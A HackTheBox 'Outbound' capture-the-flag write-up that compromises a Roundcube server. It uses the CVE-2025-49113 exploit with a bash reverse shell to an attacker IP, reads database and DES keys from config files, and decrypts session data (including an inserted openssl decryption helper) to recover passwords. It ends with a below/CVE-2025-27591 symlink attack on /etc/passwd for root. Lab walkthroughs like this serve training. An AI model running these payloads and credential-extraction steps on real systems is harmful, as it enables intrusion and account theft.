Outbound HTB Writeup — Roundcube CVE-2025–49113 Exploit
6 min read · Nov 21, 2025
Introduction
In this HackTheBox lab, Outbound, I explored a real-world scenario involving a Roundcube webmail server. The objective was to perform end-to-end penetration testing from initial enumeration and vulnerability discovery to exploitation, credential harvesting, and ultimately gaining root access.
Reconnaissance
I began the engagement by performing a comprehensive Nmap scan to identify open ports and running services on the target machine.
nmap 10.10.11.77 -sV -A
The results were as follows:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan revealed two active services:
- SSH (port 22), a potential remote login point.
- HTTP (port 80), a web server running nginx 1.24.0, which redirected to the domain mail.outbound.htb.
To correctly interact with the web application, I updated my /etc/hosts file to resolve the domain to the target IP:
echo "10.10.11.77 mail.outbound.htb" | sudo tee -a /etc/hosts
This ensured that mail.outbound.htb resolved to the target, enabling further web enumeration.
Exploitation
After accessing the web application with the provided credentials (User: tyler, Pass: LhKL1o9Nm3X2), I observed that the mailbox was completely empty.
To identify potential vulnerabilities, I used Nuclei, a fast and configurable vulnerability scanner developed by ProjectDiscovery. I ran the following command:
nuclei -u http://mail.outbound.htb -tags cves
Note: Nuclei requires regularly updated YAML templates to detect known vulnerabilities, misconfigurations, CVEs, and exposures in web applications, APIs, and servers.
The scan flagged a critical vulnerability:
[CVE-2025-49113:version_check] [http] [critical] http://mail.outbound.htb/ ["Roundcube Version: 1.6.10"]
This indicated that the target was running a vulnerable version of Roundcube Webmail susceptible to Remote Code Execution (RCE).
I proceeded with the exploit:
1. Clone the exploit repository:
git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit
cd CVE-2025-49113-exploit
2. Install requirements:
sudo apt install php-cli
3. Configure the payload using the provided credentials and a reverse shell:
php CVE-2025-49113.php http://mail.outbound.htb <username> <password> "bash -c 'bash -i >& /dev/tcp/<your-ip>/<port> 0>&1'"
4. Set up a Netcat listener on my local machine:
nc -lnvp 4444
5. Execute the exploit:
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/10.10.14.59/4444 0>&1'"
The tool confirmed:
[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10610
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...
Shortly after, the reverse shell connected to my listener:
Listening on 0.0.0.0 4444
Connection received on 10.10.11.77 47002
bash: no job control in this shell
www-data@mail:/$
At this stage, I had successfully obtained a low-privileged shell as www-data on the target system.
Post-Exploitation: Database Enumeration
After obtaining a low-privileged shell on the target, I started enumerating the Roundcube Webmail configuration files. Accessing the configuration allowed me to identify critical credentials stored on the system. I navigated to the Roundcube config directory and read the main configuration file:
cat /var/www/html/roundcube/config/config.inc.php
From the file, I discovered the MySQL database credentials:
Database user: roundcube
Database password: RCDBPass2025
Database host: localhost
Database: roundcube
Additionally, I confirmed that MySQL was running on its default port 3306, giving me an opportunity to query the database directly.
Enumerating Active Sessions
Using the retrieved credentials, I connected to the Roundcube database to enumerate active user sessions:
mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e "use roundcube; select * from session;" -E
The output revealed session IDs, associated IPs, and session variables for users currently logged in. For example:
*************************** 2. row ***************************
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
ip: 172.17.0.1
vars: …
_id: 1
username: jacob
Decoding Session Data
The session data retrieved from the Roundcube database appeared to be encoded. To extract meaningful information such as usernames, session tokens, or potentially passwords, I used CyberChef for decoding and decryption.
The encrypted value extracted from the session data was:
L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
From the config.inc.php file, I had already noted the Roundcube encryption key:
rcmail-!24ByteDESkey*Str
This key is essential for decrypting session data and user credentials. After researching Roundcube’s encryption mechanism, I confirmed it uses Triple-DES (DES-EDE3-CBC) for encrypting sensitive values.
Preparing the Data for Decryption
Before decryption, the session data must be decoded from Base64 to hexadecimal, providing a valid input for the Triple-DES algorithm.
Additionally, the decryption requires an initialization vector (IV). Roundcube prepends the 8-byte IV to the ciphertext before Base64-encoding, so the IV is the first 8 bytes (16 hex characters) of the decoded value and the remaining bytes are the Triple-DES input:
IV: 2f b4 6f d3 40 3c 4e ec
Input (hex): 09 02 be bb 90 84 f1 c5 c4 a0 9c 89 36 e4 09 bf
Decrypting in CyberChef
Using the above IV and the encryption key, I configured CyberChef to:
- Convert the Base64 session string to hex.
- Apply Triple-DES (DES-EDE3-CBC) decryption with the known key and IV.
This process successfully revealed Jacob’s password and other session information, enabling further exploitation such as session hijacking or lateral movement on the target machine.
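As an added example (not part of the writeup and not Roundcube's own code), the same decode-and-decrypt steps done with the openssl command line instead of CyberChef; it assumes the value layout described above (8-byte IV prepended to the DES-EDE3-CBC ciphertext, PKCS#7 padding, as produced by Roundcube's rcube::encrypt()) and a Linux host with openssl and GNU coreutils.

```shell
#!/bin/sh
# Added helper, not from the writeup or Roundcube. Reproduces the CyberChef recipe:
#   base64( IV || DES-EDE3-CBC(des_key, IV, PKCS#7-padded plaintext) ), 8-byte IV.
# Needs openssl and GNU coreutils (base64 -w0, od, head, tail).

# Raw bytes on stdin -> lowercase hex on stdout (CyberChef's "To Hex" step).
to_hex() { od -An -tx1 | tr -d ' \n'; }

# First 8 bytes of the decoded blob: the IV.
rc_iv_hex() { printf '%s' "$1" | base64 -d | head -c 8 | to_hex; }

# Everything after the IV: the ciphertext that Triple-DES receives.
rc_ct_hex() { printf '%s' "$1" | base64 -d | tail -c +9 | to_hex; }

# rc_decrypt BLOB DES_KEY -> plaintext. The 24-character des_key goes to -K as hex;
# openssl removes the PKCS#7 padding and fails loudly if key or blob is wrong.
rc_decrypt() {
    printf '%s' "$1" | base64 -d | tail -c +9 |
        openssl enc -d -des-ede3-cbc \
            -K "$(printf '%s' "$2" | to_hex)" \
            -iv "$(rc_iv_hex "$1")"
}

# rc_encrypt PLAINTEXT DES_KEY -> blob in the same layout, so the decrypt path can be
# checked by round trip without touching a live session table.
rc_encrypt() {
    tmp=$(mktemp)
    openssl rand 8 > "$tmp"                      # fresh random IV, stored first
    printf '%s' "$1" |
        openssl enc -des-ede3-cbc \
            -K "$(printf '%s' "$2" | to_hex)" \
            -iv "$(to_hex < "$tmp")" >> "$tmp"    # ciphertext appended after the IV
    base64 -w0 < "$tmp"
    rm -f "$tmp"
}

# Usage with the value recovered from the session table above:
#   rc_iv_hex 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/'   -> 2fb46fd3403c4eec
#   rc_decrypt 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/' 'rcmail-!24ByteDESkey*Str'
```

Every stored value unlocks with the single des_key in config.inc.php, which is why that file's permissions matter as much as the database password.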
Switching to Jacob
After successfully decrypting the session data, I retrieved Jacob’s password:
595mO8DmwGeD
With this credential, I performed a user switch to assume Jacob’s account on the target system:
su jacob
Post-Exploitation: SSH Credential Discovery and Access
After switching to Jacob’s account, I performed a directory enumeration and discovered an email containing SSH credentials in his mailbox:
cat /home/jacob/mail/INBOX/jacob
The email from Mel indicated a recently enabled resource monitoring system and included the updated password for Jacob’s SSH account:
Username: jacob
Password: gY4Wr3a1evp4
With these credentials, I was able to connect to the target system via SSH:
ssh jacob@10.10.11.77
When prompted, I entered the password extracted from the email. Authentication succeeded, granting me a remote SSH session as Jacob, which provided a more stable and interactive shell for further enumeration and potential privilege escalation.
Retrieving the User Flag
After successfully establishing an SSH session as Jacob, I proceeded to locate the user flag on the system. Using the standard search for HackTheBox-style flags, I ran:
find / -type f -name "user.txt" 2>/dev/null
This command located the user flag in Jacob’s home directory. Displaying its contents confirmed successful retrieval:
cat /home/jacob/user.txt
At this point, I had successfully captured the user flag, completing the initial compromise of the system.
Privilege Escalation: Exploiting CVE-2025–27591
After retrieving the user flag, I checked the sudo privileges for Jacob to identify potential paths for privilege escalation:
sudo -l
The output revealed that Jacob could run the below utility with wildcard arguments without a password:
(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
This indicated a potential command injection vulnerability. After research, I identified CVE-2025–27591, which allows privilege escalation via improperly handled file logging in the below utility.
Exploiting the Vulnerability
I located a publicly available proof-of-concept exploit for this CVE:
https://github.com/BridgerAlderson/CVE-2025-27591-PoC/blob/main/exploit.py
I transferred the exploit to the target, edited it if necessary, and executed it as Jacob:
nano exploit.py
python3 exploit.py
The exploit performed the following steps:
- Verified that /var/log/below was world-writable.
- Removed the existing log file and created a symlink to /etc/passwd.
- Triggered the below record command to append a malicious root entry.
- Switched to a root shell via the newly created user.
Upon successful exploitation, I obtained a root shell:
root@outbound:/home/jacob#
Retrieving the Root Flag
Finally, I retrieved the root flag to complete the capture-the-flag objective:
cat /root/root.txt
This confirmed full system compromise and completion of the exercise.
For more detailed walkthroughs and write-ups, check out my GitHub